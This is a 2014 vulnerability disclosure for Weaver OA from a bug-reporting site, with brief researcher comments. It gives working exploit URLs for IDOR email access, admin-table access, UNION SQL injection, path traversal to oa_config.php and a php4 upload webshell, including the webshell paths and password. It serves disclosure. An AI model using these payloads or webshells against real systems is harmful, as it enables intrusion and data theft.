泛微OA漏洞集合（sql注入、未授权访问等）

0x00: 想说的一些废话

下面出现的漏洞，据我了解还没有人报过，千万别说又跟什么什么漏洞重复了（点绝对不同）！

http://**.**.**.**/bugs/wooyun-2013-039855

这里通过（1）官方演示 （2）某一案例 来演示其通用型。

官方测试账户为 夏静，案例测试账户为 程琳。

0x01：平行越权导致查看任意用户邮件信息

问题链接：http://**.**.**.**/general/email/new/index.php?EMAIL_ID=7

问题参数：EMAIL_ID

问题说明：遍历参数EMAIL_ID的值，可查看他人邮件信息

漏洞证明：

（1）官方演示：

http://**.**.**.**:8028/general/email/new/index.php?EMAIL_ID=9503

http://**.**.**.**:8028/general/email/new/index.php?EMAIL_ID=9504

（2）案例演示：

http://**.**.**.**:8000/general/email/new/index.php?EMAIL_ID=726155

http://**.**.**.**:8000/general/email/new/index.php?EMAIL_ID=726152

0x02：纵向越权导致直接操作数据表

问题链接：http://**.**.**.**/ikernel/admin/

问题说明：登录该OA系统后，可访问ikernel目录，但是系统提示“没有权限操作”，此时可直接访问ikernel/admin/目录，可对表结构及表本身进行操作。

漏洞证明：

（1）官方演示：

有些显示的是乱码或显示不清楚，为方便截图进行了全选操作

（2）案例演示：

0x03：纵向越权导致的SQL注入漏洞

问题链接：http://**.**.**.**/ikernel/admin/IK_TABLE/field/?TABLE_ID=9

问题参数：TABLE_ID

问题说明：这里貌似好多都存在注入，测试中只选取一点。虽gpc为on，但是数字型的不影响。

漏洞证明：

（1）官方演示：

获取数据库当前用户 http://**.**.**.**:8028/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user()

获取当前数据库名称 http://**.**.**.**:8028/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20database()

（2）案例演示：

获取数据库当前用户 http://**.**.**.**:8000/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user()

获取当前数据库名称 http://**.**.**.**:8000/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20database()

0x04：文件下载漏洞

问题链接：http://**.**.**.**/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php

问题说明：下载是个zend加密的文件，可在网上进行解密。该文件中包含数据库链接文件。测试发现官方的已不是加密文件。

（1）官方演示：

http://**.**.**.**:8028/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php

（2）案例演示：

http://**.**.**.**:8000/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php

0x05：文件上传导致任意代码执行

问题链接：http://**.**.**.**/general/email/

问题说明：在【内部邮件】-【新建邮件】的附件处，可上传php4文件类型（官方demo中抓包改包可上传php4文件），通过查看源码找到对应的部分文件路径。最后webshell访问路径为 http://**.**.**.**/attachment/源码中找到的部分路径/文件名.php4

（1）官方演示：

得到的webshell地址为：http://**.**.**.**:8028/attachment/1915193417/conf1g.php4 密码8

（2）案例演示：

得到的webshell地址为：http://**.**.**.**:8000/attachment/950753027/conf1g.php4 密码8

同上

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-09-09 08:51

厂商回复：

最新状态：

暂无

1. 2014-09-04 12:03 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

   1

   坐等

   1# 回复此人

2. 2014-09-04 12:11 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

   0

   还没来得及弄泛微呢，我也坐等。

   2# 回复此人

3. 2014-09-04 12:37 | p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)

   0

   为什么我的没上首页走的小厂商呢，因为没把泛微写在标题上？

   3# 回复此人

4. 2014-09-04 13:00 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

   1

   正在用

   4# 回复此人

5. 2014-09-04 14:10 | 小歪 ( 路人 | Rank:30 漏洞数:4 | 一直以蜗牛的速度在前行，但从不停歇。)

   1

   晕，手里一堆泛微的洞

   5# 回复此人

6. 2014-09-04 14:49 | 专业种田 ( 核心白帽子 | Rank:1676 漏洞数:213 | 没有最专业的农民,只有更努力地耕耘..........)

   1

   你们都是大牛。

   6# 回复此人

7. 2014-09-04 16:53 | reality0ne ( 路人 | Rank:18 漏洞数:7 )

   0

   没报通用吗。。最近眼里全是钱

   7# 回复此人